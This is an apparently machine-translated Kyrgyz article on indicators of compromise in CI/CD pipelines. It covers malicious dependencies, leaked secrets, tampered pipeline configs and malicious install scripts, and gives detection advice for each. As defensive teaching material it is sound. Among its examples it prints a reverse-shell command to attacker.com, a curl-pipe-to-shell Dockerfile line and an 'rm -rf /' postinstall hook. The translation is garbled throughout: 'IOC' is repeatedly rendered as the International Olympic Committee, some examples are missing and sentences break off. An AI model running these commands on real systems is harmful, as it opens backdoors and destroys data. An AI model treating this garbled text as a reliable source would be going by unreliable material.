Киришүү: Киберкоопсуздуктагы компромисстин көрсөткүчтөрү кайсылар?
Компромисстин белгилери - бул сиздин системаңыздын же pipeline кол салууга дуушар болушу мүмкүн. Жөнөкөй сөз менен айтканда, компромисстин көрсөткүчтөрү чабуулчулар калтырган издер, кызыктай сыяктуу logins, файл өзгөрүүлөрү же жашыруун зыяндуу программа. Эл аралык Олимпиада комитетинин киберкоопсуздугу, алар кылмыш болгон жерде манжа издери сыяктуу иш алып барып, бир нерсе туура эмес экенин ачык далилдеп турат. Ошондуктан, иштеп чыгуучулар сураганда компромисстин белгилери кайсылар, жооп серверлер же брандмауэрлер менен гана чектелбейт, ошондой эле заманбап технологияларда жашырылган тобокелдиктерди камтыйт. CI/CD pipelines.
бул pipelines, чабуулчулар кодду бурмалап, зыяндуу көз карандылыктарды киргизип же түзүү кадамдарын байкатпай өзгөртө алышат. Бирок, көпчүлүк колдонмолор дагы эле серверлерге же тармактарга гана көңүл бурушат. Натыйжада, программалык камсыздоо чынжыры эң оңой буталардын бирине айланды.
Ошондуктан компромисстик көрсөткүчтөрдү табуу CI/CD pipelines абдан маанилүү. Баарынан мурда, ал командаларга зыяндуу программаларды бөгөттөөгө, сырларды коргоого жана программалык камсыздоону жеткирүүнүн ар бир кадамын коопсуз кылууга жардам берет.
Компромисстин эң мыкты 10 көрсөткүчү CI/CD Pipelines
Компромисстик көрсөткүчтөрдү түшүндүрүүдө көпчүлүк тизмелер серверлерге же тармактарга басым жасайт. Бирок CI/CD pipelines, чабуулчулар ар кандай манжа издерин калтырышат. Бул сигналдарды таануу проактивдүү коргонуу үчүн абдан маанилүү. Төмөндө ар бир иштеп чыгуучу жана коопсуздук инженери көңүл бурушу керек болгон ЭОКтун киберкоопсуздук боюнча 10 кооптуу белгиси келтирилген.
1. Көз карандылыктын шектүү өзгөрүүлөрү
Компромисстин негизги көрсөткүчтөрүнүн бири pipelines күтүүсүз, кызыктай көз карандылык жаңыртуусу. Чабуулчулар көбүнчө кооптуу пакеттерди кошуу үчүн иштеп чыгуучулардын пакет менеджерлерине жайгаштырган ишенимин колдонушат.
Мисалы, npm a'да package.json айырма күтүлбөгөн жерден төмөнкүлөрдү камтышы мүмкүн:
Мындай өзгөртүүлөр коопсуз көрүнүшү мүмкүн, бирок ар бир курулмага трояндаштырылган кодду киргизиши мүмкүн.
таасири: бузулган түзүлүштөр зыяндуу программаларды булактан мурастап алышат.
аныктоо: көз карандылыкты карап чыгууну ишке ашыруу, кулпуланган файлдардын айырмачылыктарын көзөмөлдөө жана жаңы пакеттерди ар дайым сканерлөө.
2. Курулуштардагы чаташтырылган код
Зыяндуу программалык камсыздоонун авторлору сын-пикирлерди айланып өтүү үчүн бүдөмүктөтүүгө таянышат. Натыйжада, бул компромисс көрсөткүчү CI/CD pipelines кармоо эң кыйындардын бири болушу мүмкүн. Чындыгында, түшүнүксүз пайдалуу жүктөөлөр көп учурда эскертүүсүз ачык булактуу китепканаларга же контейнер сүрөттөрүнө кирип кетет.
Мисалы:
- PyPI пакети колдонулат
base64.b64decode("cHJpbnQoSGFja2VkKQ=="). - Керексиз UPX бинардык файлдары менен толтурулган Docker сүрөтү.
- JavaScript'ке толгон
\x41\x42жашыруун маалыматтарды уурдагандардан качып кутулат.
таасири: Жашыруун код куруу же иштөө учурунда үнсүз аткарылат, бул IOC киберкоопсуздугунда маанилүү сигнал болуп саналат.
аныктоо: бириктирүү SAST коддолгон же пакеттелген кодду белгилөө үчүн зыяндуу программаларды сканерлөө менен. Баарынан мурда, бүдөмүктөтүүнү андан ары иликтөөгө татыктуу кооптуу белги катары караңыз.
3. Gitте ачылган сырлар: IOCтун классикалык киберкоопсуздук коркунучу
CI/CD pipelines көбүнчө сырларды түздөн-түз репозиторийлерден мураска алат. Бирок, Gitте сырлар пайда болгондо, алар "компромисстин көрсөткүчтөрү кайсылар?" деген суроого эң так жооптордун бирине айланат. pipelineс?" Gitке ишеним грамоталары түшкөндөн кийин, чабуулчулар аларды чексиз пайдалана алышат.
Мисалы:
- A
.envкамтыган файлAWS_SECRET_KEY=. - Токендер киргизилди
config.json. - Git тарыхында алынып салынгандан кийин дагы эле сырлар көрүнүп турат.
таасири: Ачык ачкычтар чабуулчуларга түз мүмкүнчүлүк берет CI/CD pipelines, булут системалары же маалымат базалары. Ошондуктан, бул компромисстин эң кооптуу көрсөткүчтөрүнүн бири.
аныктоо: колдонуу pre-commit hooks жана жашыруун сканерлөө үчүн CI тапшырмаларын аткаруу жана агып кеткен ачкычтарды дароо жокко чыгаруу. Мындан тышкары, экспозиция терезелерин азайтуу үчүн автоматташтырылган калыбына келтирүүнү ишке ашыруу.
4. Бузулган Pipeline Конфигурациялар: Компромисстин жашыруун көрсөткүчтөрү
Pipeline конфигурациялар жогорку баалуу максаттар болуп саналат, анткени бир өзгөртүү көп учурда бүтүндөй жумуш агымын басып алатНатыйжада, бурмаланган pipeline файлдар салттуу мониторинг куралдары сейрек аныктаган ЭОКтун киберкоопсуздук боюнча негизги коркунучу болуп саналат.
Мисалы:
GitHub аракеттеринде:
- GitLab программасында: зыяндуу жумуш кошулду
.gitlab-ci.ymlал сезимтал маалыматтарды төгүп салат. - Дженкинсте:
sh "nc -e /bin/bash attacker.com 4444".
таасири: Бул бекитилбеген өзгөртүүлөр сиздин pipeline чабуулчулар үчүн туруктуу жашыруун эшикке айланган, бул компромисстин көрсөткүчү катары эсептелет.
аныктоо: Кол коюлган конфигурацияларды күчүнө киргизүү, коомчулук менен байланыш боюнча бекитүүлөрдү талап кылуу жана күтүлбөгөн жумуштарды көзөмөлдөө. Мындан тышкары, орнотуу guardrails өзгөртүлгөн жумуш агымдарын автоматтык түрдө бөгөттөйт.
5. артыкчылыктуу IaC Демейки
Туура эмес конфигурацияланган инфраструктуранын аныктамалары көп учурда жашыруун арткы эшиктерди жаратат. Натыйжада, артыкчылыктуу демейки жөндөөлөр IaC ЭОКтун киберкоопсуздук боюнча классикалык коркунучу болуп саналат.
Мисалы:
- Kubernetes жайылтууга уруксат берүүчү подкасттар
privileged: true. - Helm диаграммалары кызматтарды көрсөтөт
0.0.0.0:22.
таасири: Чабуулчулар түпкү деңгээлдеги мүмкүнчүлүк алышат же ички кызматтарды ачыкка чыгарышат. Натыйжада, бул көйгөйлөр чабуулдун бетин бир топ кеңейтет.
аныктоо: колдонуу IaC бириктирүүдөн мурун эң аз артыкчылыкты камсыз кылуу үчүн сканерлөө. Мындан тышкары, ар бир конфигурациянын бир бөлүгү катары каралып чыгышын камсыз кылыңыз pipeline.
6. Адаттан тыш дене түзүлүш жүрүм-туруму
Кол салгандар көп учурда өзгөрөт pipeline зыяндуу аракеттерге баруу үчүн жүрүм-турум. Башкача айтканда, адаттан тыш курулуш иши компромисстин белгилери эмнеде деген суроого эң так жооптордун бири болуп саналат. CI/CD pipelines.
Мисалы:
- Чоочун домендерге чыгуучу тармактык суроо-талаптарды жасоочу түзүлүштөр.
- Node.js долбоору күтүүсүздөн PowerShell программасын ишке киргизди
npm install. - Курулуш скрипттеринде аныкталбаган чоң экилик файлдарды жүктөп алуу боюнча CI тапшырмасы.
таасири: Бузулган курулмалар зыяндуу программаларды таратуу пункттары катары кызмат кыла алат. Баарынан маанилүүсү, алар ар бир жайгаштыруу аркылуу зыяндуу жүктөрдү таратышат.
аныктоо: Күтүлбөгөн процесстер же байланыштар үчүн курулуш журналдарын көзөмөлдөңүз. Андан тышкары, нормадан тышкары жүрүм-турумдарды белгилөө үчүн аномалияларды аныктоону конфигурациялаңыз.
7. Зыяндуу пакет скрипттери ЭОКтун киберкоопсуздук коркунучу катары
Пакет менеджерлери жашоо циклин колдойт hooks чабуулчулар эксплуатациялайт. Ошондуктан, npm, PyPI же Docker файлдарындагы зыяндуу скрипттер компромисстин күчтүү көрсөткүчтөрү болуп саналат.
Мисалы:
- npm:
postinstallскрипт иштеп жататrm -rf /же C2ге маяк менен багыттоо. - PyPI:
setup.pyорнотуу учурунда жашыруун Python кодун аткаруу. - Dockerfile:
RUN curl attacker.sh | sh.
таасири: Чабуул орнотуу учурунда, кандайдыр бир иштөө убактысын сыноодон мурун ишке ашат. Демек, иштеп чыгуучулар кеч болуп калганга чейин байкабай калышы мүмкүн.
аныктоо: Орнотуу скрипттери үчүн пакеттин манифесттерин сканерлеңиз. Мындан тышкары, тобокелдүү чектөөлөрдү коюңуз hooks in CI/CD таасирди азайтуу үчүн жумуш орундары.
8. Реестрдеги уулануунун компромисстик көрсөткүчтөрү
Чабуулчулар реестрлердеги артефакттарды алмаштырышат же өзгөртүшөт, жана бул окуялар жеткирүү чынжырындагы компромисстин көрсөткүчтөрүнүн окуу куралындагы мисалдары болуп саналат. pipelines.
Мисалы:
- Docker сүрөт теги трояндаштырылган катмар менен тымызын жаңыртылды.
- Ички таңгак ууланган версия менен алмаштырылды.
- npm аталыш мейкиндигинде отуруп ойноо, мисалы
lodash-proxy.
таасири: Реестр артефактын колдонгон ар бир түзүлүш бузулууга дуушар болот. Мындан тышкары, бузулуу кийинки кызматтарга да жайылат.
аныктоо: Бардык реестрдик файлдарда кол тамганы жана бүтүндүктү текшерүүнү ишке ашырыңыз. Мындан тышкары, артефакттын келип чыгышын көзөмөлдөө SBOM валидация.
9. Колдонуучунун аномалдуу активдүүлүгү ЭОКтун далили катары
Бузулган эсептер дээрлик ар дайым анормалдуу издерди калтырат. Ошого жараша, иштеп чыгуучунун адаттан тыш жүрүм-туруму компромисстин күчтүү көрсөткүчү болуп саналат.
Мисалы:
- Commitжергиликтүү убакыт боюнча таңкы саат 3тө тартылган.
- Эс алуудагы аккаунттар тарабынан PR бекитүүлөрү.
- Pipelines адаттан тыш жыштыкта иштетилет.
таасири: Чабуулчулар уурдалган маалыматтарды зыяндуу өзгөртүүлөрдү киргизүү үчүн колдонушат. Кантсе да, уруксатсыз commitкадимки жумуш агымдарына оңой аралашат.
аныктоо: ченөө SCM аномалиялар боюнча иш-аракеттерди жүргүзүү, MFAны колдонуу жана токендерди үзгүлтүксүз алмаштыруу. Мындан тышкары, шектүү учурларда эскертүү commit же бекитүү үлгүлөрү.
10. ЭОКтун киберкоопсуздугундагы бүтүндүктү же кол тамганы текшерүүдөгү ийгиликсиздиктер
Көп кездешкен, бирок көңүл бурулбаган нерсе компромисстин көрсөткүчү бүтүндүктү же кол тамганы текшерүү ишке ашкан жок. ЭОКтун киберкоопсуздугунда бул текшерүүлөр коддун же артефакттардын аныктыгын текшерет. Аларды өткөрүп жиберүү менен кетет pipelineлар ачыкка чыкты.
мисалдар:
- SHA256 хэши күтүлгөн текшерүү суммасына дал келбейт.
- GPG кол тамгасы жок же жараксыз.
- An SBOM кол коюлбаган артефакттарды көрсөтүү.
таасири: Бүтүндүктүн бузулушу көбүнчө маалыматтарды бузууну, реестрди ууландырууну же зыяндуу программалык камсыздоону киргизүүнү билдирет.
аныктоо: Кол тамга текшерүүлөрүн автоматташтырыңыз, текшерүү суммасын текшерүүнү ишке ашырыңыз жана кол коюлбаган компоненттерди бөгөттөңүз. Эң негизгиси, ар бир ийгиликсиз текшерүүнү компромисстин ачык далили катары караңыз.
CI/CD Кыскача компромисс көрсөткүчтөрү
| Компромисс көрсөткүчү (IOC) | таасири CI/CD Pipelines | Кантип аныктоо |
|---|---|---|
| Шектүү көз карандылыктын өзгөрүшү | Чабуулчулар пакет менеджерлерине зыяндуу китепканаларды киргизишет, бул бузулган түзүлүштөргө алып келет. | Lockfile айырмачылыктарын көзөмөлдөңүз, көз карандылыкты карап чыгууну камсыз кылыңыз жана көз карандылыктарды үзгүлтүксүз сканерлеңиз. |
| Курулуштардагы чаташтырылган код | Жашыруун пайдалуу жүктөөлөр курулуш учурунда же иштөө учурунда аныкталбастан аткарылат. | колдонуу SAST жана base64, hex же packed код үлгүлөрүн белгилөө үчүн зыяндуу программаларды сканерлөө. |
| Git'те ачылган сырлар | Агып чыккан токендер же API ачкычтары чабуулчуларга маанилүү системаларга түз кирүү мүмкүнчүлүгүн берет. | Git'те жашыруун сканерлөөнү иштетүү hooks жана агып чыккан грамоталарды автоматтык түрдө жокко чыгарыңыз. |
| Бузулган Pipeline Ырасталыштар | Өзгөртүлгөн жумуш агымдары маалыматтарды чыгарып салууга же ичинде сактоого мүмкүндүк берет CI/CD. | PR бекитүүлөрүн талап кылуу, кол коюлган конфигурацияларды аткаруу жана көзөмөлдөө pipeline өзгөртүүлөр. |
| Артыкчылыктуу IaC Демейки | Ашыкча уруксат берүүчү ролдор же кооптуу демейки жөндөөлөр булут чөйрөлөрүн ачыкка чыгарат. | Эң аз артыкчылыктарды колдонуу үчүн Terraform, Kubernetes жана Helm файлдарын сканерлеңиз. |
| Адаттан тыш курулуш жүрүм-туруму | Pipelines зыяндуу программаларды таратуу пункттары же капталдан жылуу үчүн колдонулат. | Күтүлбөгөн жүктөөлөр, процесстер же чыгуучу чалуулар үчүн курулуш журналдарын талдаңыз. |
| Зыяндуу пакет скрипттери | Орнотууга чейинки/орнотулгандан кийинки жашыруун скрипттер иштөө убактысын сыноодон мурун пайдалуу жүктөмдөрдү иштетет. | Кооптуу npm/PyPI скрипттерин бөгөттөө жана аткарууну чектөө CI/CD жумуш. |
| Реестрдик уулануу | Трояндаштырылган артефакттар реестрлердеги ишенимдүү сүрөттөрдү же экилик файлдарды алмаштырат. | Текшерүү суммаларын текшериңиз, кол тамганы текшерүүнү камсыз кылыңыз жана реестрлерди алдын ала сканерлеңиз. |
| Колдонуучунун аномалдуу аракеттери | Бузулган аккаунттар зыяндуу программаларды жайылтууда commitс же триггер pipelines. | ТИМди ишке ашыруу, көзөмөлдөө commitаномалиялар үчүн s жана талдоо login ченемдүүлүктөрү. |
| Бүтүндүктү же кол тамганы текшерүү ишке ашкан жок | Бузулган кодду, көз карандылыктарды же сүрөттөрдүн кирип жатканын көрсөтөт pipeline. | Бүтүндүктү текшерүүнү автоматташтырыңыз жана кол коюлбаган же дал келбеген компоненттерди бөгөттөңүз. |
Эмне үчүн салттуу Эл аралык Олимпиада комитетинин киберкоопсуздугу жетишпейт CI/CD тобокелдиктер
Көпчүлүк уюмдар серверлерде, компьютерлерде же тармактарда компромисстик көрсөткүчтөрдү көзөмөлдөп турушат. Бирок, Эл аралык Коопсуздук Комитетинин киберкоопсуздукка карата бул классикалык мамилеси көңүл сыртында калтырат CI/CD pipelines, алар азыр эң маанилүү чабуул беттеринин бири. Чындыгында, pipelines салттуу куралдар аныктай албаган уникалдуу компромисстик сигналдарды көрсөтөт.
Салттуу коопсуздуктагы компромисс көрсөткүчтөрү
Кадимки ЭОКтун киберкоопсуздугунда, адатта, төмөнкүлөргө көңүл бурулат:
- Тан loginже уурдалган грамоталарды көрсөткөн IP даректер.
- Зыяндуу программаны көрсөткөн шектүү файл хэштери же реестрдеги өзгөрүүлөр.
- Маалыматтарды чыгарып салууну көрсөткөн күтүлбөгөн чыгуучу трафик.
Булар ошондой эле көзөмөлдөнгөн белгилүү индикаторлор MITER ATT&CK алкагы, ал жалпы каршылаштын жүрүм-турумун жана тактикасын картага түшүрөт. Булар пайдалуу сигналдар. Бирок, алар негизинен операциялык тутумдарга же корпоративдик тармактарга тиешелүү. Натыйжада, алар программалык камсыздоо чынжырында мурда болуп өткөн тымызын бурмалоолорду байкабай калышат.
Неге CI/CD Pipelines Ар түрдүү
CI/CD pipelines - бул иштеп чыгуучулар commit код, тартуу көз карандылыктары жана чыгаруу курулмалары. Чабуулчулар бул жерде ар бир жайгаштырууда бир компромисс болоорун билишет. Ошого жараша, компромисстин индикаторлору эмнелер? CI/CD pipelineс? Алар абдан башкача көрүнөт:
- package.json же requirements.txt файлына зыяндуу көз карандылык тымызын кошулду.
- Git'те көрсөтүлгөн API ачкычтары же токендери commits же .env файлдары.
- npm же PyPI пакеттерине бурмаланган код киргизилди.
- Terraform же Kubernetes файлдары, мисалы, артыкчылыктуу: true сыяктуу кооптуу демейки жөндөөлөргө ээ.
- Pipeline маалыматтарды чыпкалоо же арткы эшиктерди ачуу үчүн түзөтүлгөн жумуштар.
Бул компромисстик сигналдар CI/CD көрүнбөй калуу standard коопсуздук куралдары.
Эл аралык Олимпиада комитетинин киберкоопсуздугундагы ажырым
Көптөгөн командалар компромисстик көрсөткүчтөрдүн баалуулугун түшүнсө да, алар дагы эле серверлерден жана тармактык журналдардан аныктоого гана таянышат. Ошондуктан, чабуулчулар кадимки из калтырбай, курулмаларды ууландырып же зыяндуу программаны киргизе алышат. Ошондуктан XZ Utils арткы эшиги же зыяндуу npm пакеттери сыяктуу инциденттер өндүрүшкө жеткенге чейин аныкталбай калган.
Мындай жеткирүү чынжырындагы компромисстер дагы төмөнкүлөр менен баса белгиленет CISA компаниясынын жеткирүү чынжырынын коопсуздугу боюнча көрсөтмөсү, бул чабуулчулар барган сайын көбүрөөк бутага алып жатканын эскертет CI/CD pipelineжана реестрлер.
Дукат
ЭОКтун салттуу киберкоопсуздугу зарыл, бирок жетишсиз. Баарынан мурда, командалар компромисске тиешелүү көрсөткүчтөрдү таанышы керек CI/CD pipelineс. Ошондо гана алар зыяндуу кодду аныктай алышат же pipeline чөйрөгө жайыла электе кыянаттык менен пайдалануу.





